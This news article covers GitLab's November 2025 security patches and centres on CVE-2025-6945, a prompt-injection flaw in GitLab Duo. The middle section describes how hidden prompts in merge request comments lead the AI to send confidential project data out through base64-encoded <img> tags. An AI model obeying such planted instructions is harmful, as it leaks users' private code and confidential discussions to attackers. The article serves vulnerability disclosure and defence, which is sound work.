On November 12, 2025, GitLab released critical patch versions 18.5.2, 18.4.4, and 18.3.6 for both Community Edition (CE) and Enterprise Edition (EE), addressing a series of security flaws that could expose sensitive data through prompt injection and other vectors.
These updates fix nine vulnerabilities, including a low-severity but insidious prompt-injection issue in GitLab Duo that allows authenticated users to manipulate AI-driven code reviews and leak confidential information.
Organizations running affected versions are urged to upgrade immediately to mitigate risks, such as data exfiltration from private projects and other issues.
GitLab.com has already been patched; Dedicated customers require no action, but self-managed instances may experience downtime during upgrades.
The release highlights GitLab’s commitment to rapid response, with vulnerabilities disclosed publicly 30 days post-patch via their issue tracker.
Among the fixes, prompt injection stands out due to its implications for AI-assisted development workflows, where hidden malicious instructions can hijack responses and embed exploitable elements.
This batch also includes high-severity cross-site scripting (XSS) in the Kubernetes proxy and medium-severity authorization bypasses, amplifying the urgency for updates across versions dating back to 13.2.
Unpacking The Prompt Injection Flaw
The core vulnerability, CVE-2025-6945, affects GitLab Duo’s review feature in EE versions from 17.9 up to but not including the patched releases, with a CVSS score of 3.5 indicating low severity but real-world potential for harm.
Authenticated users can inject hidden prompts into merge request comments, tricking the AI into extracting and leaking sensitive data from confidential issues, such as internal discussions or zero-day vulnerability details.
This indirect prompt injection exploits Duo’s inadequate input sanitization, allowing attackers to embed instructions that manipulate outputs, such as base64-encoded data exfiltrated via rendered HTML elements, including malicious <img> tags.
In practice, an attacker might poison a public merge request description with a concealed prompt, which then influences a victim’s interaction with Duo Chat leading to source code theft or redirection to phishing sites.
Reported by researcher Rogerace via HackerOne, this flaw underscores broader risks in AI tools, where prompt leakage can reveal system instructions, permissions, and filtering mechanisms, enabling further exploits like data breaches or regulatory violations.
Earlier incidents, such as those detailed by Legit Security in May 2025, demonstrated similar attacks on Duo, highlighting how AI’s access to project artifacts amplifies threats beyond traditional code review.
Complementing this, related information disclosure issues such as CVE-2025-7000 and CVE-2025-2615 enable unauthorized views of branch names and GraphQL data, potentially chaining with prompt injection to escalate data exposure.
These flaws affect CE/EE from 16.7 and 17.6, respectively, allowing blocked or low-privilege users to bypass controls via WebSocket subscriptions or issue access.
CVSS scores of 4.3 reflect a moderate impact. However, when combined with AI manipulation, they could facilitate targeted reconnaissance in enterprise environments.
Broader Security Patches and Mitigation Steps
Beyond prompt injection, the patches address a high-severity XSS in the Kubernetes proxy (CVE-2025-11224, CVSS 7.7), where improper input validation lets authenticated users execute scripts under specific conditions, impacting versions from 15.10.
An incorrect authorization flaw in workflows (CVE-2025-11865, CVSS 6.5) allows users to tamper with others’ Duo flows, discovered internally by GitLab’s Dylan Griffith.
Lower-severity fixes include path traversal in branch names (CVE-2025-11990), an access control bypass in Pages (CVE-2025-7736), and a DoS via crafted markdown (CVE-2025-12983), all of which remediate authenticated abuse vectors.
Additional updates include upgrading libxslt to 1.1.43 to fix CVEs such as 2024-55549, as well as various bug fixes, including Rack upgrades to 2.2.20 and Redis to 7.2.11 for stability.
Upgrading may involve post-deploy migrations, which can cause downtime on single-node setups.
However, zero-downtime procedures apply to multi-node setups via Helm or Omnibus.
GitLab recommends following best practices, such as enabling Duo prompt guardrails and monitoring for anomalous AI interactions, to prevent future exploits.
 and Enterprise){kind=link}